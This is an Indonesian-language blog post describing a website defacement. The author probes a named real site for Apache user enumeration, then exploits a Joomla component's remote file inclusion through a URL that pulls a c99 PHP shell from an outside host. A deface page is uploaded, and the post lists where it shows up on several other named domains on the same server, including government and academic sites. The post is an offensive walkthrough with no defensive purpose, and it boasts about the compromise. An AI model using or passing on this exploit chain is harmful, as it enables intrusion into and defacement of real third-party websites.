User Enumeration merupakan kelemahan dari Apache yang memungkinkan kita untuk menjalankan user yang ada di server tersebut.
Cara menguji suatu server vulner terhadap user enumeration – > http://target.com/~root
jika pesan yang muncul “Forbidden” berarti server tersebut vulner.
Pada kasus ini ternyata site http://griyadesign.com/~root muncul pesan “Forbidden”

Saia coba cari Vulnerability RFI Joomla Component, eh nemu com_joomla-visites vuln, exploitnya bisa diliat di

http://www.exploit-db.com/exploits/14476/

Ok langsung eksekusi php shellnya

http://griyadesign.com/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.site.com/c99.txt

Yeah, shell bisa dieksekusi, tinggal upload shell dan jgn lupa halaman php atau html kalian, terserah dah ^^
http://griyadesign.com/default.php

Sekarang coba kita cari site mana aja yang satu server sama http://griyadesign.com
klo saia pake :
http://www.yougetsignal.com/tools/web-sites-on-web-server/

Ternyata ada puluhan domain disana 🙂 )

tadi user http://griyadesign.com pada server adalah griyades
/home/griyades/public_html/

Setelah upload halaman php atau html, sekarang kita coba di beberapa site yang satu server dengan http://griyadesign.com
ini hasilnya :

http://15menit.net/~griyades/default.php
http://www.siakkab.go.id/~griyades/default.php
http://www.iii.ac.id/~griyades/default.php
http://takalarkab.go.id/~griyades/default.ph

p
dll 😀

http://vyc0d.blogspot.com/2010/07/teknik-user-enumeration.html